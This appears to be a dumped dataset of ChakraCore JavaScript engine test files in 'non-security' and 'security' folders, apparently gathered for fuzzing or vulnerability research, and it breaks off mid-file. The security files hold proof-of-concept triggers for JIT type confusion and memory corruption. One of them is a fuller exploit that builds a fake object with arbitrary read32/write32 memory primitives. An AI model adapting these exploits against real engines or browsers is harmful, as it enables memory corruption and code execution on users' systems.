| function newTarget() {} 12 | const obj = Reflect.construct(c, ["prop-value-2"], newTarget); 13 | print("DONE") 14 | 15 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/677c7106a430132148dc483fac5a0b06.js: -------------------------------------------------------------------------------- 1 | (function() { 2 | "use asm"; 3 | m => 0; 4 | })() 5 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/6edfa75ccf20fa9d33f076396248e106.js: -------------------------------------------------------------------------------- 1 | function Base() { } 2 | 3 | Base.prototype = { 4 | f() { 5 | return "Base " + this.toString(); 6 | }, 7 | x: 15, 8 | toString() { 9 | return "this is Base"; 10 | } 11 | }; 12 | 13 | function Derived() { 14 | this.derivedDataProperty = "xxx"; 15 | } 16 | Derived.prototype = { 17 | __proto__: Base.prototype, 18 | toString() { return "this is Derived"; }, 19 | x: 27, 20 | f() { 21 | 22 | var a = super.x; 23 | 24 | print(this.x); 25 | return "Derived"; 26 | } 27 | }; 28 | 29 | print(new Base().f()); 30 | print(new Derived().f()); 31 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/73ecced13c9732ab92114dfdb8825c89.js: -------------------------------------------------------------------------------- 1 | class B { 2 | set x(v) { print("B.prototype.set x"); this._x = v; } 3 | get x() { print("B.prototype.get x"); return this._x; } 4 | } 5 | 6 | class A extends B { 7 | set x(v) { print("A.prototype.set x"); super.x = v + 100; } 8 | get x() { print("A.prototype.get x"); return super.x; } 9 | } 10 | 11 | var a = new A(); 12 | a.x = 100; 13 | print(a.x); 14 | 15 | var a1 = new A(); 16 | a1.x = 100; 17 | print(a1.x); 18 | 19 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/7bc84ae4eda042d373b7f997302480b9.js: -------------------------------------------------------------------------------- 1 | (function() { 2 | "use asm"; 3 | (function(){}); 4 | })(); 5 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/82e82d53acb33c17d1755312689cc663.js: -------------------------------------------------------------------------------- 1 | //testStart.js 2 | WScript.LoadScriptFile("/data2/sunnyeo/data-set/no-security/ChakraCore/crash/4482_main.js","module"); 3 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/84333d579a39730166faa6ce3b64b830.js: -------------------------------------------------------------------------------- 1 | function shouldBe(actual, expected) { 2 | 3 | } 4 | 5 | { 6 | let target = {}; 7 | let handlers = { 8 | get: function(theTarget, propName, receiver) { 9 | 10 | shouldBe(receiver, 1); 11 | return 42; 12 | } 13 | }; 14 | let proxy = new Proxy(target, handlers); 15 | shouldBe(Reflect.get(proxy, 0, 0x777777), 42); 16 | } 17 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/84db5a947b8ef7b74afd7f1fee8eb550.js: -------------------------------------------------------------------------------- 1 | var i = 0; 2 | JSON.stringify(new Proxy([], { 3 | get(t, pk, r){ 4 | if (pk === "length") { 5 | return ++i; 6 | } 7 | return Reflect.get(t, pk, r); 8 | } 9 | })); 10 | 11 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/9c66602e79773ee7de25104e699c6581.js: -------------------------------------------------------------------------------- 1 | function getSloppyGenerator() { 2 | return function* f(x) {}; 3 | } 4 | 5 | function test(testFunction) { 6 | testFunction(getSloppyGenerator()); 7 | } 8 | 9 | 10 | function testReconfigureAsAccessorProperty(f) { 11 | print(f.length); 12 | var length = 2; 13 | print(Object.getOwnPropertyDescriptor(f, "length").configurable) 14 | Object.defineProperty(f, 'length', { 15 | get: function() { return length; }, 16 | set: function(v) { print("in set"); length = v; } 17 | }); 18 | print("set"); 19 | f.length = 3; 20 | print("get " + f.length); 21 | 22 | } 23 | 24 | 25 | test(testReconfigureAsAccessorProperty); 26 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/a47a62eab398c21869cc73cad4eccb62.js: -------------------------------------------------------------------------------- 1 | let p = new Proxy({}, {}); 2 | let wm = new WeakMap(); 3 | wm.set(p, 2); 4 | print(wm.get(p)); 5 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/a64df42a15c2777963b8e0d008ad5326.js: -------------------------------------------------------------------------------- 1 | 'ß'.toUpperCase() === 'SS' 2 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/ad2700833a5c053340b578050d9731dd.js: -------------------------------------------------------------------------------- 1 | var {proxy, revoke} = Proxy.revocable({a: 0}, new Proxy({}, { 2 | get(t, pk) { 3 | if (pk === "getOwnPropertyDescriptor") 4 | revoke(); 5 | } 6 | })); 7 | Object.keys(proxy); 8 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/b24d653b3efaddb9e36b87813527d384.js: -------------------------------------------------------------------------------- 1 | const a = WScript.LoadScript("function a(){}"); 2 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/bff71298ab7ceb4865b02fda1b217747.js: -------------------------------------------------------------------------------- 1 | var p = new Proxy([], {}); 2 | class MyArray extends Array { 3 | static get [Symbol.species]() { 4 | return function() { return p; } 5 | }; 6 | } 7 | //size = 0xffffffff; 8 | size = 0xffffffff; 9 | w = new MyArray(size); 10 | x = Array.prototype.concat.call(w); 11 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/d3150ff7d8b5cede4098dc40cb42f81e.js: -------------------------------------------------------------------------------- 1 | WScript = {}; 2 | WScript.Echo = console.log; 3 | $ERROR = console.log; 4 | assert = {}; 5 | assert.sameValue = function (x 6 | ,y 7 | ,z) { 8 | return x == y; 9 | }; 10 | assert.notSameValue = 11 | function (x,y,z) { 12 | return not(x == y); 13 | }; 14 | assert.throws = function (x,f) { 15 | f(); 16 | }; 17 | testOption = function (x) { 18 | }; 19 | assert.sameValue(Function.prototype[Symbol.hasInstance].call(0) 20 | ,false); 21 | assert.sameValue(Function.prototype[Symbol.hasInstance].call({}) 22 | ,false); 23 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/e680755792aa4abdf9a439d9983d84dd.js: -------------------------------------------------------------------------------- 1 | function attach() { 2 | return new Promise(function (r) { 3 | WScript.Attach(r); 4 | }); 5 | } 6 | 7 | async function mainTest() { 8 | for (let i = 0; i < 1; ++i) { 9 | await attach(); 10 | } 11 | } 12 | mainTest(); 13 | -------------------------------------------------------------------------------- /js_tests/Chakra/non-security/f08d971f88dadd007a7c3d7b92a63377.js: -------------------------------------------------------------------------------- 1 | var proxy = new Proxy(function(){}, {}); 2 | class C extends proxy { 3 | constructor() { 4 | super(Object.setPrototypeOf(C, function(){})) 5 | } 6 | } 7 | Reflect.construct(C, [], proxy); 8 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/032e67cac67406c7bc627f049739ed7a.js: -------------------------------------------------------------------------------- 1 | "use strict"; 2 | 3 | function func(a, b, c) { 4 | a[0] = 1.2; 5 | b[0] = c; 6 | a[1] = 2.2; 7 | a[0] = 2.3023e-320; 8 | } 9 | 10 | function main() { 11 | var a = [1.1, 2.2]; 12 | var b = new Uint32Array(100); 13 | 14 | // force to optimize 15 | for (var i = 0; i < 0x10000; i++) 16 | func(a, b, i); 17 | 18 | func(a, b, { 19 | valueOf: function () { 20 | a[0] = {}; 21 | 22 | return 0; 23 | } 24 | }); 25 | 26 | a[0].toString(); 27 | } 28 | 29 | main(); 30 | 31 | WScript.Echo('pass'); 32 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/0438dcc5717dcfba590a58146e8342df.js: -------------------------------------------------------------------------------- 1 | function inlinee() { 2 | new Error(); 3 | return inlinee.arguments[0]; 4 | } 5 | 6 | function opt(convert_to_var_array) { 7 | /* 8 | To make the in-place type conversion happen, it requires to segment. 9 | */ 10 | 11 | let stack_arr = []; // JavascriptNativeFloatArray 12 | stack_arr[10000] = 1.1; 13 | stack_arr[20000] = 2.2; 14 | 15 | let heap_arr = inlinee(stack_arr); 16 | convert_to_var_array(heap_arr); 17 | 18 | stack_arr[10000] = 2.3023e-320; 19 | 20 | return heap_arr[10000]; 21 | } 22 | 23 | function main() { 24 | for (let i = 0; i < 10000; i++) { 25 | opt(new Function('')); // Prevents to be inlined 26 | } 27 | 28 | print(opt(heap_arr => { 29 | heap_arr[10000] = {}; // ConvertToVarArray 30 | })); 31 | } 32 | 33 | main(); 34 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/0594329cb631d0f451efaf77951cfc1e.js: -------------------------------------------------------------------------------- 1 | function Module() { 2 | 'use asm'; 3 | function f() { 4 | arr(); 5 | } 6 | 7 | function g() { 8 | } 9 | 10 | var arr = [g]; 11 | return f; 12 | } 13 | 14 | let f = Module(); 15 | f(); 16 | 17 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/084b113898b1d0efe80ad4267136b6e6.js: -------------------------------------------------------------------------------- 1 | function Module() { 2 | 'use asm'; 3 | 4 | function f() { 5 | } 6 | 7 | return f; 8 | } 9 | 10 | function recur() { 11 | try { 12 | recur(); 13 | } catch (e) { 14 | Module(1); 15 | } 16 | } 17 | 18 | recur(); 19 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/11bcbe29c6c12f5d68efd4ef047616f6.js: -------------------------------------------------------------------------------- 1 | function opt(arr) { 2 | arr[0] = 1.1; 3 | this[0] = {}; 4 | arr[0] = 2.3023e-320; 5 | } 6 | 7 | function main() { 8 | let arr = [1.1]; 9 | for (let i = 0; i < 10000; i++) { 10 | opt.call({}, arr); 11 | } 12 | 13 | opt.call(arr, arr); 14 | print(arr); 15 | } 16 | 17 | main(); 18 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/11c5d58e62c843b667191f6cc191251f.js: -------------------------------------------------------------------------------- 1 | function f() { 2 | let arr = new Uint32Array(0x1000); 3 | for (let i = 0; i < 0x7fffffff;) { 4 | arr[++i] = 0x1234; 5 | } 6 | } 7 | 8 | f(); 9 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/138652a6f59a3f3fe07c07e60f872234.js: -------------------------------------------------------------------------------- 1 | function opt(arr, arr2) { 2 | arr[0] = 1.1; 3 | Math.max.apply(Math, arr2); 4 | arr[0] = 2.3023e-320; 5 | } 6 | 7 | function main() { 8 | let arr = [1.1, 2.2, 3.3, 4.4]; 9 | for (let i = 0; i < 10000; i++) { 10 | opt(arr, [1, 2, 3, 4]); 11 | } 12 | 13 | Math.max = function () { 14 | arr[0] = {}; 15 | }; 16 | 17 | opt(arr, {}); // can't handle, calls Math.max 18 | print(arr[0]); 19 | } 20 | 21 | main(); 22 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/151858cbef318192f02ff18bf5450e82.js: -------------------------------------------------------------------------------- 1 | function f() { 2 | ({a = () => { 3 | let arguments; 4 | }} = 1); 5 | 6 | arguments.x; 7 | } 8 | f(); 9 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/1b9b16589db8a4144bf33be24da1026f.js: -------------------------------------------------------------------------------- 1 | function* f() { 2 | } 3 | 4 | let g; 5 | f.__defineGetter__('length', function () { 6 | g = this; // g == "scriptFunction" 7 | }); 8 | 9 | 10 | f.length; 11 | 12 | g.call(0x1234, 0x5678); // type confusion 13 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/1d82c72a52b7ae891c640a809cde6ec1.js: -------------------------------------------------------------------------------- 1 | function opt(arr, proto) { 2 | arr[0] = 1.1; 3 | let tmp = {__proto__: proto}; 4 | arr[0] = 2.3023e-320; 5 | } 6 | 7 | function main() { 8 | let arr = [1.1, 2.2, 3.3]; 9 | for (let i = 0; i < 10000; i++) { 10 | opt(arr, {}); 11 | } 12 | 13 | opt(arr, arr); 14 | print(arr); 15 | 16 | } 17 | 18 | main(); 19 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/202082cdb0d72ba16b289ba0277d7ddd.js: -------------------------------------------------------------------------------- 1 | function opt(arr) { 2 | if (arr.length <= 15) 3 | return; 4 | 5 | let j = 0; 6 | for (let i = 0; i < 2; i++) { 7 | arr[j] = 0x1234; // (a) 8 | j += 0x100000; 9 | j + 0x7ffffff0; 10 | } 11 | } 12 | 13 | function main() { 14 | for (let i = 0; i < 0x10000; i++) { 15 | opt(new Uint32Array(100)); 16 | } 17 | } 18 | 19 | main(); 20 | 21 | WScript.Echo('pass'); 22 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/2d094ed06a413ead55365500b3647adf.js: -------------------------------------------------------------------------------- 1 | function createModule() { 2 | 'use asm'; 3 | const a = 1.0; 4 | function f() { 5 | var b = a; 6 | var a = 0; 7 | } 8 | 9 | return f; 10 | } 11 | var f = createModule(); 12 | f(); 13 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/2d26bd586d0ba2e37e0695b567f7a06f.js: -------------------------------------------------------------------------------- 1 | function f() { 2 | { 3 | let i; 4 | function g() { 5 | i; 6 | } 7 | 8 | try { 9 | throw 1; 10 | } catch ({e = eval('dd')}) { 11 | } 12 | } 13 | } 14 | 15 | f(); 16 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/30b0d4e25c6cc3f8d5ca83fd58ff3630.js: -------------------------------------------------------------------------------- 1 | function go(){ 2 | a1 = [1.1,2.2] 3 | a2 = [1.1,2.2] 4 | ab = new ArrayBuffer(4) 5 | tarr = new Uint8ClampedArray(ab) 6 | 7 | fakeaddr = 0xaaaabbbbbbbb * 4.9406564584124654E-324; 8 | function aaa(p1,p2,ii){ 9 | p1[0] = 1.1 10 | p1[1] = 2.2 11 | p2[0] = ii 12 | p1[0] = fakeaddr 13 | return ii 14 | } 15 | 16 | function bbb(p1,p2,ii){ 17 | p1[0] = 1.1 18 | p1[1] = 2.2 19 | p2[0] = ii 20 | return p1[0] 21 | } 22 | 23 | for(var i=0; i <0x100000; i++) { 24 | aaa(a1,tarr,3) 25 | } 26 | 27 | for(var i=0; i <0x100000; i++) { 28 | bbb(a2,tarr,3) 29 | } 30 | 31 | var arr = new Array( 32 | 0x11111111,0x11111111,0x11111111,0x11111111,0x11111111, 33 | 0x11111111,0x11111111,0x11111111,0x11111111,0x11111111, 34 | 0x11111111,0x11111111,0x11111111,0x11111111,0x11111111 35 | ) 36 | ab = new ArrayBuffer(0x100) 37 | var farr = new Float64Array(ab) 38 | var uarr = new Uint32Array(ab) 39 | 40 | farr[0] = bbb(a2, tarr, {toString:function(){a2[0] = arr; return 9}}) 41 | var leakaddr = uarr[1]*0x100000000+uarr[0] 42 | 43 | fakeaddr = (leakaddr+0x58) * 4.9406564584124654E-324; 44 | aaa(a1, tarr, {toString:function(){a1[0] = {}; return 9}}) 45 | typeidaddr = leakaddr+0x58 46 | abaddr = leakaddr+0x2c 47 | 48 | function low32(v) 49 | { 50 | return (v % 0x100000000); 51 | } 52 | 53 | function high32(v) 54 | { 55 | return Math.floor(v / 0x100000000); 56 | } 57 | 58 | function toInt(v) 59 | { 60 | return v < 0x80000000 ? v : -(0x100000000 - v); 61 | } 62 | 63 | function toUint(v) 64 | { 65 | return v >= 0 ? v : (0x100000000 + v); 66 | } 67 | 68 | arr[0] = 56 69 | arr[1] = 0 70 | arr[2] = toInt(low32(typeidaddr)) 71 | arr[3] = toInt(high32(typeidaddr)) 72 | arr[4] = 0 73 | arr[5] = 0 74 | arr[6] = 0 75 | arr[7] = 0 76 | arr[8] = 0xabcd 77 | arr[9] = 0 78 | arr[10] = toInt(low32(abaddr)) 79 | arr[11] = toInt(high32(abaddr)) 80 | arr[12] = 0 81 | arr[13] = 0 82 | arr[14] = 0x41414141 83 | arr[15] = 0x41414141 84 | arr[16] = 0 85 | arr[17] = 0 86 | 87 | fakeobj = a1[0] 88 | 89 | var read32 = function(addr){ 90 | arr[14] = toInt(low32(addr)) 91 | arr[15] = toInt(high32(addr)) 92 | return DataView.prototype.getUint32.call(fakeobj, 0, true) 93 | } 94 | 95 | var write32 = function(addr, v){ 96 | arr[14] = toInt(low32(addr)) 97 | arr[15] = toInt(high32(addr)) 98 | DataView.prototype.setUint32.call(fakeobj, 0, v, true) 99 | } 100 | 101 | WScript.Echo("vtable:" + read32(leakaddr+4).toString(16) + read32(leakaddr).toString(16)) 102 | 103 | arr.length = 0xffffffff 104 | write32(leakaddr+0x44, 0xffffffff) 105 | write32(leakaddr+0x48, 0xffffffff) 106 | 107 | write32(0xaaaabbbbbbbb, 0) 108 | 109 | } 110 | try{ 111 | go()}catch(e){} 112 | 113 | WScript.Echo('pass'); 114 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/31efc1d474de2597d5c61096c7aefbf7.js: -------------------------------------------------------------------------------- 1 | function trigger() { 2 | try { 3 | } catch ({x}) { 4 | var x = 1; 5 | } 6 | 7 | print(x); 8 | } 9 | 10 | trigger(); 11 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/438cd0259c3c3eaaeada10d45a57bebf.js: -------------------------------------------------------------------------------- 1 | function inlinee() { 2 | 3 | } 4 | 5 | function opt(arr) { 6 | arr[0] = 1.1; 7 | new inlinee(); 8 | arr[0] = 2.3023e-320; 9 | } 10 | 11 | function main() { 12 | let arr = [1.1]; 13 | for (let i = 0; i < 10000; i++) { 14 | inlinee.prototype = {}; 15 | opt(arr); 16 | } 17 | 18 | inlinee.prototype = arr; 19 | opt(arr); 20 | 21 | print(arr); 22 | } 23 | main(); 24 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/4439a653039d36f21d826d4e154d0351.js: -------------------------------------------------------------------------------- 1 | function opt(obj) { 2 | for (let i in obj.inlinee.call({})) { 3 | } 4 | 5 | for (let i in obj.inlinee.call({})) { 6 | } 7 | } 8 | 9 | function main() { 10 | let obj = { 11 | inlinee: function () { 12 | } 13 | }; 14 | 15 | for (let i = 0; i < 10000; i++) 16 | opt(obj); 17 | } 18 | 19 | main(); 20 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/45597a60240bd4655b555856f15bb0f0.js: -------------------------------------------------------------------------------- 1 | const simpleAsmDef = ` 2 | function x(v) { 3 | v = v | 0; 4 | return v | 0; 5 | } 6 | return x;`; 7 | eval(` 8 | var o = { 9 | set m(stdlib) { 10 | "use asm" 11 | var I32 = stdlib.Int32Array; 12 | ${simpleAsmDef} 13 | } 14 | } 15 | o.m = 5; 16 | `) -------------------------------------------------------------------------------- /js_tests/Chakra/security/4c48f6365c277bc0748af530b189a910.js: -------------------------------------------------------------------------------- 1 | const simpleAsmDef = ` 2 | function x(v) { 3 | v = v | 0; 4 | return v | 0; 5 | } 6 | return x;`; 7 | WScript.LoadModule(` 8 | export default function AsmDefaultExport() { 9 | "use asm" 10 | ${simpleAsmDef} 11 | }`) 12 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/4df093e402080c42ee7df1f00239dcc7.js: -------------------------------------------------------------------------------- 1 | function main() { 2 | RegExp.input = {toString: f}; 3 | RegExp.lastMatch; 4 | // alert(RegExp.lastMatch); 5 | } 6 | 7 | var input = [Array(10000000).join("a"), Array(11).join("b"), Array(100).join("a")].join(""); 8 | 9 | function f() { 10 | String.prototype.match.call(input, "bbbbbbbbbb"); 11 | } 12 | 13 | main(); 14 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/502e25e7a29c7e0f161a52266eabd27c.js: -------------------------------------------------------------------------------- 1 | let args = new Array(0x10000); 2 | args = args.fill(0x1234).join(', '); 3 | eval('new Array(' + args + ')'); 4 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/571b316543613a61af63b7d3ca2a113e.js: -------------------------------------------------------------------------------- 1 | class MyClass { 2 | f(a) { 3 | print(a); 4 | } 5 | 6 | constructor() { 7 | 'use asm'; 8 | function f(v) { 9 | v = v | 0; 10 | return v | 0; 11 | } 12 | return f; 13 | } 14 | 15 | f2(a) { 16 | print(a); 17 | } 18 | } 19 | 20 | MyClass(1); 21 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/5a8254f91a8a517300231382d9e1336c.js: -------------------------------------------------------------------------------- 1 | var kNumProperties = 32; 2 | 3 | var o = {}; 4 | for (var i = 0; i < kNumProperties; ++i) 5 | o['a' + i] = i; 6 | 7 | Object.preventExtensions(o); // IsNotExtensibleSupported && !this->VerifyIsExtensible 8 | 9 | for (var i = 0; i < kNumProperties; ++i) 10 | delete o['a' + i]; 11 | 12 | for (var i = 0; i < 0x21; ++i) 13 | o['a0'] = 1; // calling TryUndeleteProperty again again 14 | 15 | WScript.Echo('pass'); -------------------------------------------------------------------------------- /js_tests/Chakra/security/638b1113d6ab2833782e1351a93e34f1.js: -------------------------------------------------------------------------------- 1 | let a = ''; 2 | let b = 'A'.repeat(0x10000); 3 | for (let i = 0; i < 0x10000; i++) { 4 | a = 'BBBBBBBBB' + a + b; 5 | } 6 | 7 | print(a.length); 8 | print(b.length); 9 | print(a[0]); 10 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/656e1b9e4f95190fba4ffcfac9e93ec7.js: -------------------------------------------------------------------------------- 1 | function lower(x) { 2 | // returns the lower 32bit of x 3 | return parseInt(("0000000000000000" + x.toString(16)).substr(-8,8),16) | 0; 4 | } 5 | function upper(x) { 6 | // returns the upper 32bit of x 7 | return parseInt(("0000000000000000" + x.toString(16)).substr(-16, 8),16) | 0; 8 | } 9 | var addr = 0x12345678; 10 | var a1 = []; 11 | for (var i = 0; i < 0x100; i++) { 12 | a1[i] = i; 13 | } 14 | var a2 = [lower(addr), upper(addr)]; 15 | var c = new Function(); 16 | c[Symbol.species] = function() { 17 | new_array = []; 18 | return new_array; 19 | }; 20 | a1.constructor = c; 21 | a2.__defineGetter__(Symbol.isConcatSpreadable, function () { 22 | new_array[0] = {}; 23 | return true; 24 | }); 25 | var res = a1.concat(a2); 26 | res[0x100/2]; 27 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/65e7a56f9d05e99f4d2b4343992d9f8b.js: -------------------------------------------------------------------------------- 1 | let arr = []; 2 | arr[1000] = 321321; 3 | let proto = {}; 4 | Object.defineProperty(proto, "0", {get: function() { 5 | arr[2000] = 0x41414141; 6 | return 123; 7 | }}); 8 | 9 | arr.__proto__ = proto; 10 | Array.prototype.reverse.call(arr); 11 | Array.prototype.sort.call(arr); 12 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/679309dceef3d2f2187f1111f4075b4c.js: -------------------------------------------------------------------------------- 1 | var code = 'a'.repeat(0x55555600); 2 | eval(code); 3 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/685836ad34a740613868a23358d0827c.js: -------------------------------------------------------------------------------- 1 | function trigger() { 2 | let arr = [1.1]; 3 | let i = 0; 4 | for (; i < 1000; i += 0.5) { 5 | arr[i + 0x7777] = 2.0; 6 | } 7 | 8 | arr[1001] = 35480.0; 9 | 10 | for (; i < 0x7777; i++) { 11 | arr[i] = 1234.3; 12 | } 13 | } 14 | 15 | for (let i = 0; i < 100; i++) { 16 | trigger(); 17 | } 18 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/6c3265b8555f5efa042d716f0880070a.js: -------------------------------------------------------------------------------- 1 | function opt(arr, value) { 2 | arr[1] = value; 3 | arr[0] = 2.3023e-320; 4 | } 5 | 6 | function main() { 7 | for (let i = 0; i < 0x10000; i++) 8 | opt([1.1], 2.2); 9 | 10 | let arr = [1.1]; 11 | opt(arr, -5.3049894784e-314); // MAGIC VALUE! 12 | 13 | print(arr); 14 | } 15 | 16 | main(); 17 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/6f573a162ac0a9ac7487690f9bbdd246.js: -------------------------------------------------------------------------------- 1 | function opt() { 2 | let obj = [2.3023e-320]; 3 | for (let i = 0; i < 1; i++) { 4 | obj.x = 1; // In the first analysis, BailOnNotObject emitted 5 | obj = +obj; // Change the type 6 | obj.x = 1; // Type confusion 7 | } 8 | } 9 | 10 | function main() { 11 | for (let i = 0; i < 1000; i++) { 12 | opt(); 13 | } 14 | } 15 | 16 | main(); 17 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/70a6a1d18869f227db158450031fb994.js: -------------------------------------------------------------------------------- 1 | function f13() { 2 | var a = function jnvgfg(sfgnmj = function ccunlk() { jnvgfg(undefined, 1); }, b) { 3 | if (b) { 4 | // assert.areEqual(undefined, jnvgfg, "This refers to the instance in the body and the value of the function expression is not copied over"); 5 | } 6 | var jnvgfg = 10; 7 | if (!b) { 8 | sfgnmj(); 9 | return 100; 10 | } 11 | }; 12 | // assert.areEqual(100, a(), "After the recursion the right value is returned by the split scoped function"); 13 | }; 14 | f13(); 15 | 16 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/72edfd4a7c465d252587b4713edda6ff.js: -------------------------------------------------------------------------------- 1 | var getterCalled = false; 2 | var a = [1, 2]; 3 | for (var i = 0; i < 100 * 1024; i++) { 4 | a.push(i); 5 | } 6 | delete a[0]; // Make a missing item 7 | var protoObj = [11]; 8 | Object.defineProperty(protoObj, '0', { 9 | get : function () { 10 | getterCalled = true; 11 | Object.setPrototypeOf(a, Array.prototype); 12 | a.splice(0); // head seg is now length=0 13 | return 42; 14 | }, 15 | configurable : true 16 | }); 17 | Object.setPrototypeOf(a, protoObj); 18 | var b = a.slice(); 19 | //assert.isTrue(getterCalled); 20 | //assert.areEqual(0, a.length, "Getter will splice the array to zero length"); 21 | //assert.areEqual(100 * 1024 + 2, b.length, "Validating that slice will return the full array even though splice is deleting the whole array"); 22 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/77cf3ade75703485020325e9e78019d2.js: -------------------------------------------------------------------------------- 1 | let a = [0]; 2 | let b = [0]; 3 | b.__defineGetter__(Symbol.isConcatSpreadable, () => { 4 | b[0] = 1.2; 5 | return true; 6 | }); 7 | 8 | let res = a.concat(b, 0x1234); 9 | print(res); 10 | 11 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/7acd3aaa7688052307c7773e40d2ad24.js: -------------------------------------------------------------------------------- 1 | function f() { 2 | ({a = () => { 3 | let arguments; 4 | }} = 1); 5 | 6 | arguments.x; 7 | } 8 | 9 | f(); 10 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/7e8cb06a56988edea77b8126fcd3816c.js: -------------------------------------------------------------------------------- 1 | const simpleAsmDef = ` 2 | function x(v) { 3 | v = v | 0; 4 | return v | 0; 5 | } 6 | return x;`; 7 | eval(` 8 | class BaseClass {} 9 | class MyClass extends BaseClass { 10 | f(a,b,c,d,e) { 11 | print(a); 12 | } 13 | constructor() { 14 | "use asm"; 15 | ${simpleAsmDef} 16 | } 17 | } 18 | var x = new MyClass("df"); 19 | x(3); 20 | `) -------------------------------------------------------------------------------- /js_tests/Chakra/security/8066d2712fe2975004b5d32404012b9a.js: -------------------------------------------------------------------------------- 1 | 'use strict'; 2 | 3 | function func(a, b, c) { 4 | a[0] = 1.2; 5 | b[0] = c; 6 | a[1] = 2.2; 7 | a[0] = 2.3023e-320; 8 | } 9 | 10 | function main() { 11 | var a = [1.1, 2.2]; 12 | var b = new Uint32Array(0); // <<--------- 100 -> 0 13 | 14 | // force to optimize 15 | for (var i = 0; i < 0x10000; i++) 16 | func(a, b, i); 17 | 18 | func(a, b, {valueOf: () => { 19 | a[0] = {}; 20 | 21 | return 0; 22 | }}); 23 | 24 | a[0].toString(); 25 | } 26 | 27 | main(); 28 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/89d68098fa7eae1f1ea36bbcfa8ced96.js: -------------------------------------------------------------------------------- 1 | function inlinee() { 2 | return inlinee.arguments[0]; 3 | } 4 | 5 | function opt(convert_to_var_array) { 6 | /* 7 | To make the in-place type conversion happen, it requires to segment. 8 | */ 9 | 10 | let stack_arr = []; 11 | 12 | // Allocate stack_ar->head to the heap 13 | stack_arr[20] = 1.1; 14 | 15 | stack_arr[10000] = 1.1; 16 | stack_arr[20000] = 2.2; 17 | 18 | let heap_arr = inlinee(stack_arr); 19 | convert_to_var_array(heap_arr); 20 | 21 | stack_arr[10000] = 2.3023e-320; 22 | 23 | return heap_arr[10000]; 24 | } 25 | 26 | function main() { 27 | for (let i = 0; i < 10000; i++) 28 | opt(new Function('')); // Prevents to be inlined 29 | 30 | print(opt(heap_arr => { 31 | heap_arr[10000] = {}; // ConvertToVarArray 32 | })); 33 | } 34 | main(); 35 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/8b0396470fd7f59d31e7bef1a629df5e.js: -------------------------------------------------------------------------------- 1 | function f() { 2 | ({a = ([arguments]) => { 3 | }} = 1); 4 | 5 | arguments.x; 6 | } 7 | 8 | f(); 9 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/8d5bb94c163d4f3ba4cf62066fa85b27.js: -------------------------------------------------------------------------------- 1 | function opt() { 2 | let arr = []; 3 | return arr['x']; 4 | } 5 | 6 | function main() { 7 | let arr = [1.1, 2.2, 3.3]; 8 | for (let i = 0; i < 0x10000; i++) { 9 | opt(); 10 | } 11 | 12 | Array.prototype.__defineGetter__('x', Object.prototype.valueOf); 13 | 14 | print(opt()); 15 | } 16 | 17 | main(); 18 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/906d168d7a129503b55f57eca3a25aa5.js: -------------------------------------------------------------------------------- 1 | function trigger() { 2 | let a, b, c; 3 | 4 | function g() { 5 | trigger(); 6 | 7 | a, b, c; 8 | } 9 | 10 | g(); 11 | } 12 | 13 | trigger(); 14 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/91d46d54f82febfe84a24f6001a68d43.js: -------------------------------------------------------------------------------- 1 | (function func(arg = function () { 2 | return func; 3 | }()) { 4 | return func; 5 | function func() {} 6 | })(); 7 | 8 | WScript.Echo('pass'); 9 | -------------------------------------------------------------------------------- /js_tests/Chakra/security/9759a1cf463948911b7ea6467cfe39b8.js: -------------------------------------------------------------------------------- 1 | function opt(arr, arr2) { 2 | arr2[0]; 3 | 4 | arr[0] = 1.1; 5 | arr2.reverse(); 6 | arr[0] = 2.3023e-320; 7 | } 8 | 9 | function main() { 10 | let arr = [1.1, 2.2, 3.3]; 11 | arr.__proto__ = null; // avoid inline caching 12 | delete arr[1]; // avoid doArrayMissingValueCheckHoist 13 | 14 | let arr2 = [, {}]; 15 | 